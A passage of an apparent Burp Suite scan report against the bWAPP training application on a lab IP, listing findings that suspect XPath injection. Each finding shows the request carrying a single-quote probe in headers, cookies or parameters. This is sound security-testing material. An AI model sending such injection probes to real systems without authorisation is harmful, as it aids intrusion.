<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.2. http://192.168.52.147/bWAPP/ [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /bWAPP/ HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'
Accept-Encoding: gzip, deflate
Host: 192.168.52.147
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:03:33 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.3. http://192.168.52.147/bWAPP/ [name of an arbitrarily supplied URL parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/

Issue detail

The name of an arbitrarily supplied URL parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied URL parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /bWAPP/?1'=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 192.168.52.147
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:03:27 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.4. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [Base64-decoded value of the secret cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_captcha_bypass.php

Issue detail

The Base64-decoded value of the secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Base64-decoded value of the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_captcha_bypass.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_captcha_bypass.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2fJw%3d%3d; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

form_security_level=submit&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:04:22 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13484

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.5. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [Referer HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_captcha_bypass.php

Issue detail

The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_captcha_bypass.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

form_security_level=submit&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:04:59 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13484

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.6. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_captcha_bypass.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_captcha_bypass.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_captcha_bypass.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

form_security_level=submit&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:04:50 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13484

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.7. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [admin cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_captcha_bypass.php

Issue detail

The admin cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the admin cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_captcha_bypass.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_captcha_bypass.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0'; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

form_security_level=submit&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:04:06 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13484

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.8. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [bug parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_captcha_bypass.php

Issue detail

The bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_captcha_bypass.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_captcha_bypass.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1'&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:03:28 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.9. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [form_bug parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_captcha_bypass.php

Issue detail

The form_bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_captcha_bypass.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_captcha_bypass.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:03:37 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.10. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [form_security_level parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_captcha_bypass.php

Issue detail

The form_security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_captcha_bypass.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_captcha_bypass.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

form_security_level=submit'&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:03:28 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13484

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.11. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [name of an arbitrarily supplied URL parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_captcha_bypass.php

Issue detail

The name of an arbitrarily supplied URL parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied URL parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_captcha_bypass.php?1'=1 HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_captcha_bypass.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

form_security_level=submit&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:04:34 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13484

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.12. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [name of an arbitrarily supplied body parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_captcha_bypass.php

Issue detail

The name of an arbitrarily supplied body parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied body parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_captcha_bypass.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_captcha_bypass.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

form_security_level=submit&security_level=1&1'=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:04:27 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13484

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.13. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [secret cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_captcha_bypass.php

Issue detail

The secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_captcha_bypass.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_captcha_bypass.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2f'; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

form_security_level=submit&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:03:58 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13484

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.14. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [security_level cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_captcha_bypass.php

Issue detail

The security_level cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_captcha_bypass.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_captcha_bypass.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1'; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

form_security_level=submit&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:03:51 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13484

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.15. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [security_level parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_captcha_bypass.php

Issue detail

The security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_captcha_bypass.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_captcha_bypass.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

form_security_level=submit&security_level=1'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:03:37 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13481

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.16. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [top_security_nossl cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_captcha_bypass.php

Issue detail

The top_security_nossl cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the top_security_nossl cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_captcha_bypass.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_captcha_bypass.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317'

form_security_level=submit&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:04:13 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13484

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.17. http://192.168.52.147/bWAPP/ba_forgotten.php [Base64-decoded value of the secret cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_forgotten.php

Issue detail

The Base64-decoded value of the secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Base64-decoded value of the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_forgotten.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_forgotten.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2fJw%3d%3d; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:06:02 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.18. http://192.168.52.147/bWAPP/ba_forgotten.php [Referer HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_forgotten.php

Issue detail

